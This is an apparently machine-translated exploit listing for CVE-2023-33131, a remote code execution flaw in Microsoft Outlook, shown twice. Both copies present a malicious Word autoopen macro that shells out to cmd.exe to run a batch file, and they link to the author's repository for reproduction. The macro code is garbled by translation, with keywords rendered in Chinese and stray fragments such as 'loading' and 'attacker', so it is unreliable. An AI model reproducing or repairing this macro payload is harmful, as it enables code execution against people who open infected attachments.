## title: Microsoft Outlook Microsoft 365 MSO(版本2306构建16.0.16529.20100)32 -bit-远程代码执行
##作者: nu11secur1ty
## date: 07.07.2023
## Vendor: https://www.microsoft.com/
## Software: https://outlook.live.com/owa/
##参考: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-33131
## Description:
在此漏洞中,Microsoft Outlook应用程序允许攻击者
发送带有恶意内容的受感染的词文件
对于使用Outlook应用程序的每个人,无论网络或本地如何。
微软今天仍然没有针对这个0天漏洞的补丁程序。
## staus:高脆弱性
[+] exploit:
- 恶意词文件:
``JS
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
nikoganqqsaopraite.bat。
结束子
````````
##复制:
[HREF](https://github.com/nu11secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33131)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft outlook.html)
##时间花费:
00:30:00
##作者: nu11secur1ty
## date: 07.07.2023
## Vendor: https://www.microsoft.com/
## Software: https://outlook.live.com/owa/
##参考: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-33131
## Description:
在此漏洞中,Microsoft Outlook应用程序允许攻击者
发送带有恶意内容的受感染的词文件
对于使用Outlook应用程序的每个人,无论网络或本地如何。
微软今天仍然没有针对这个0天漏洞的补丁程序。
## staus:高脆弱性
[+] exploit:
- 恶意词文件:
``JS
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
正在加载...
attacker
结束子
````````
##复制:
[HREF](https://github.com/nu11secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33131)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft outlook.html)
##时间花费:
00:30:00